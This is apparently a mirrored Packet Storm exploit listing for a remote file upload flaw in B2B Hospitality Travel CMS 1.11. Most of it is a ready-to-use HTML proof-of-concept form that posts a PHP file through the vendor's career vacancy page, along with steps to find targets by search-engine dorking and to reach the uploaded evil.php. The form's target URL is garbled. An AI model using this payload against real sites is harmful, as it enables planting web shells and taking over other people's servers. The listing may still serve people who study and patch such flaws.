Share
## https://sploitus.com/exploit?id=PACKETSTORM:211996
=============================================================================================================================================
    | # Title     : B2B Hospitality Travel CMS 1.11 Remote File Upload Vulnerability                                                            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 137.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.b2bhospitalityindia.com/                                                                                        |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking ฤฐn Google Or Other Search Enggine.
    
    [+] The following html code uploads a executable malicious file remotely .
    
    [+] Save code As : poc.html
    
    [+] Line 09 set your Target
    
    [+] Link to the uploaded files :/uopload/evil.php
    
    [+] use payload : 
    	
    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="UTF-8">
      <title>Career Vacancy Form</title>
    </head>
    <body>
    
      <form name="enqForm" action="https://www/127.0.0.1/.b2bhospitalityindia.com/career-vacancy.php" method="POST" enctype="multipart/form-data">
        
        <label for="job">Job:</label><br>
        <input type="text" id="job" name="job" required><br><br>
    
        <label for="name">Name:</label><br>
        <input type="text" id="name" name="name" required><br><br>
    
        <label for="additional_information">Additional Information:</label><br>
        <textarea id="additional_information" name="additional_information" rows="5" cols="30"></textarea><br><br>
    
        <label for="email">Email:</label><br>
        <input type="email" id="email" name="email" required><br><br>
    
        <label for="mobile">Mobile:</label><br>
        <input type="text" id="mobile" name="mobile" required><br><br>
    
        <label for="resume">Resume:</label><br>
        <input type="file" id="resume" name="resume" accept=".pdf,.php,.docx" required><br><br>
    
        <input type="submit" name="submit" value="Submit">
    
      </form>
    
    </body>
    </html>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ============================================================